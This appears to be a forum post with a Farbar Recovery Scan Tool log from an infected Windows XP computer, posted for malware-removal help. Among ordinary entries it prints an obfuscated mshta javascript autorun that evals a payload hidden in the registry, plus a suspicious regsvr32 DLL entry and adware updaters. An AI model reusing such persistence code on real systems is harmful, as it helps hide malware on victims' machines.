Geny Baker
Posts: 23 +0
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:07-11-2015
Ran by Geny (administrator) on GENY-380 (14-11-2015 20:31:57)
Running from D:\My Docs\Downloads
Loaded Profiles: Geny (Available Profiles: Geny)
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\Av\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgcsrvx.exe
() C:\WINDOWS\system32\WLTRYSVC.EXE
(Dell Inc.) C:\WINDOWS\system32\BCMWLTRY.EXE
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avgsvcx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgwdsvcx.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Fitbit, Inc.) C:\Program Files\Fitbit Connect\FitbitConnectService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.28.15\GoogleCrashHandler.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgnsx.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Realtek Semiconductor Corp.) C:\WINDOWS\RTDCPL.EXE
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Dell Inc.) C:\WINDOWS\system32\WLTRAY.EXE
(CyberLink Corp.) C:\Program Files\PowerDVD DX\PDVDDXSrv.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\concentr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Citrix Systems, Inc.) C:\Program Files\Citrix\ICA Client\wfcrun32.exe
(Nero AG) C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Av\avgui.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Prolific Technology Inc.) C:\WINDOWS\system32\IoctlSvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Logitech, Inc.) C:\Program Files\Common Files\logishrd\KHAL3\KHALMNPR.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\Framework\Common\avguix.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\cmd.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\PresentationHost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTDCPL.EXE [2691072 2009-08-26] (Realtek Semiconductor Corp.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\WINDOWS\system32\WLTRAY.exe [2498560 2010-03-30] (Dell Inc.)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\PowerDVD DX\PDVDDXSrv.exe [128232 2009-09-11] (CyberLink Corp.)
HKLM\...\Run: [NeroFilterCheck] => C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe [570664 2008-04-28] (Nero AG)
HKLM\...\Run: [NBKeyScan] => C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe [2221352 2008-02-18] (Nero AG)
HKLM\...\Run: [ConnectionCenter] => C:\Program Files\Citrix\ICA Client\concentr.exe [300472 2010-05-12] (Citrix Systems, Inc.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\Av\avgui.exe [3826600 2015-10-30] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [2296600 2013-07-31] (Logitech, Inc.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157480 2015-04-06] (Apple Inc.)
HKLM\...\Run: [AvgUi] => C:\Program Files\AVG\Framework\Common\avguix.exe [1130408 2015-10-16] (AVG Technologies CZ, s.r.o.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll [2013-06-13] (Logitech, Inc.)
HKLM\...\Policies\Explorer\Run: [**27da8125<*>] => mshta javascript:ZXCBOya0="kcWtjWWr7";S2a1=new%20ActiveXObject("WScript.Shell");kmdIO6x7e="3P3p1lzn";cue5X8=S2a1.RegRead("HKLM\\software\\056439a146\\8c68058d");XfgI4iLgH="vPeg49";eval(cue5X8);LJ9JHh7 (the data entry has 11 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer: [NoCDBurning] 0
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [Google Update] => C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-22] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2010-11-07] (Google Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Documents and Settings\Geny\Application Data\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID ROC (the data entry has 29 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Documents and Settings\Geny\Application Data\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 --CMPID 09 (the data entry has 3 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [AVG-Secure-Search-Update_1113a] => C:\Documents and Settings\Geny\Application Data\AVG 1113a Campaign\AVG-Secure-Search-Update-1113a.exe /PROMPT /mid=f48fdd4ec99747d0be2cd16c22205815-8c828015d3fdf0ecc5373bcc2149ea8f601d3340 /CMPID=1113 (the data entry has 1 more characters).
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [uTorrent] => C:\Documents and Settings\Geny\Application Data\uTorrent\uTorrent.exe [1822048 2015-10-13] (BitTorrent Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2014-10-02] (Apple Inc.)
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\Run: [{F9D772C4-AD01-40E2-BACC-F7300FE9592E}] => regsvr32.exe "C:\Documents and Settings\Geny\Application Data\Quyitv\CofeDxun.dll"
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {4eee6362-2ae8-11e0-9d51-002564c4b1e6} - G:\setupSNK.exe
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\...\MountPoints2: {b5ec1652-5a4f-11df-9d22-002564c4b1e6} - F:\LaunchU3.exe -a
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\scrnsave.scr [9216 2008-04-14] (Microsoft Corporation)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\Av\avgrsx.exe /sync /restart
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.65
Tcpip\..\Interfaces\{7203B3FB-70D8-4079-B244-FA1D5DDCC534}: [DhcpNameServer] 192.168.0.1 205.171.2.65
Internet Explorer:
==================
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.facebook.com/
HKU\S-1-5-21-1454471165-790525478-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
URLSearchHook: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll (Conduit Ltd.)
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> DefaultScope {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {91D0C420-E910-4A17-BE98-51976FED3BC7} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> {EAF435F9-2BE3-42DD-B5F5-2785466D295F} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=1I7ADFA_enUS404
BHO: ContributeBHO Class -> {074C1DC5-9320-4A9A-947D-C042949C6216} -> C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-01-03] (Adobe Systems Incorporated)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll => No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Zynga Toolbar -> {7b13ec3e-999a-4b70-b9cb-2617b8323822} -> C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-03-30] (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKLM - Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll [2008-09-10] (Adobe Systems Incorporated.)
Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKLM - Zynga Toolbar - {7b13ec3e-999a-4b70-b9cb-2617b8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-05-08] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll [2009-02-06] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Zynga Toolbar - {7B13EC3E-999A-4B70-B9CB-2617B8323822} - C:\Program Files\Zynga\prxtbZyn0.dll [2013-07-09] (Conduit Ltd.)
Toolbar: HKU\S-1-5-21-1454471165-790525478-1801674531-1003 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-09-23] (Google Inc.)
DPF: {32C3FEAE-0877-4767-8C20-62A5829A0945} hxxp://static.ak.facebook.com/fbplugin/win32/axfbootloader.cab?1270703312359
DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} hxxp://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1269983539687
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll [2009-07-26] (Microsoft Corporation)
Filter: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
Filter: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files\Citrix\ICA Client\IcaMimeFilter.dll [2010-05-12] (Citrix Systems, Inc.)
FireFox:
========
FF ProfilePath: C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Homepage: hxxps://www.lds.org/
FF Keyword.URL:
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_19_0_0_226.dll [2015-10-28] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2009-07-10] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-23] (Google Inc.)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Air\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @facebook.com/FBPlugin,version=1.0.3 -> C:\Documents and Settings\Geny\Application Data\Facebook\npfbplugin_1_0_3.dll [2010-03-05] ( )
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/GoogleTalkPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @talk.google.com/O1DPlugin -> C:\Documents and Settings\Geny\Application Data\Mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=3 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin HKU\S-1-5-21-1454471165-790525478-1801674531-1003: @tools.google.com/Google Update;version=9 -> C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CCMSDK.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\cgpcfg.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\CgpCore.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\confmgr.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxlogging.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\ctxmui.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icafile.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\icalogon.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npicaN.dll [2010-05-12] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2015-02-12] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2012-11-15] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\sslsdk_b.dll [2010-04-14] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\TcpPServ.dll [2010-05-12] (Citrix Systems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npgoogletalk.dll [2014-10-03] (Google)
FF Plugin ProgramFiles/Appdata: C:\Documents and Settings\Geny\Application Data\mozilla\plugins\npo1d.dll [2014-10-03] (Google)
FF Extension: Garmin Communicator - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{195A3098-0BD5-4e90-AE22-BA1C540AFD1E} [2015-05-30]
FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-29] [not signed]
FF Extension: Zynga - C:\Documents and Settings\Geny\Application Data\Mozilla\Firefox\Profiles\59nmg3h4.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2015-07-15] [not signed]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-03-30] [not signed]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\itms.js [2014-10-08]
Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.lds.org/?lang=eng"
CHR Profile: C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-02]
CHR Extension: (Google Docs) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-02]
CHR Extension: (Google Drive) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-26]
CHR Extension: (YouTube) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (Google Sheets) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-02]
CHR Extension: (Google Docs Offline) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-12]
CHR Extension: (Chrome Web Store Payments) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-20]
CHR Extension: (Gmail) - C:\Documents and Settings\Geny\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-02]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 Adobe Version Cue CS4; C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe [288112 2010-03-31] (Adobe Systems Incorporated)
S3 AvgAMPS; C:\Program Files\AVG\Av\avgamps.exe [595376 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 AVGIDSAgent; C:\Program Files\AVG\Av\avgidsagent.exe [3815648 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 avgsvc; C:\Program Files\AVG\Framework\Common\avgsvcx.exe [862632 2015-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\Av\avgwdsvcx.exe [579776 2015-10-30] (AVG Technologies CZ, s.r.o.)
R2 Fitbit Connect; C:\Program Files\Fitbit Connect\FitbitConnectService.exe [1435680 2014-01-10] (Fitbit, Inc.) [File not signed]
S2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [89840 2015-03-28] (Hewlett-Packard Company)
R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [44032 2009-05-14] (Hewlett-Packard) [File not signed]
R2 PLFlash DeviceIoControl Service; C:\WINDOWS\system32\IoctlSvc.exe [81920 2006-12-19] (Prolific Technology Inc.) [File not signed]
R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53760 2009-05-14] (Hewlett-Packard) [File not signed]
R2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [2232320 2010-03-30] (Dell Inc.) [File not signed]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [156080 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [243632 2015-10-19] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [231344 2015-08-20] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [31664 2015-08-14] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [229296 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [308656 2015-08-14] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [192944 2015-10-21] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [36784 2015-08-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [231856 2015-10-08] (AVG Technologies CZ, s.r.o.)
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [2649216 2010-03-30] (Broadcom Corporation)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
R2 fssfltr; C:\WINDOWS\System32\DRIVERS\fssfltr_tdi.sys [54752 2009-08-05] (Microsoft Corporation)
S3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2008-10-28] (HP)
S3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2008-10-28] (HP)
S3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2008-10-28] (HP)
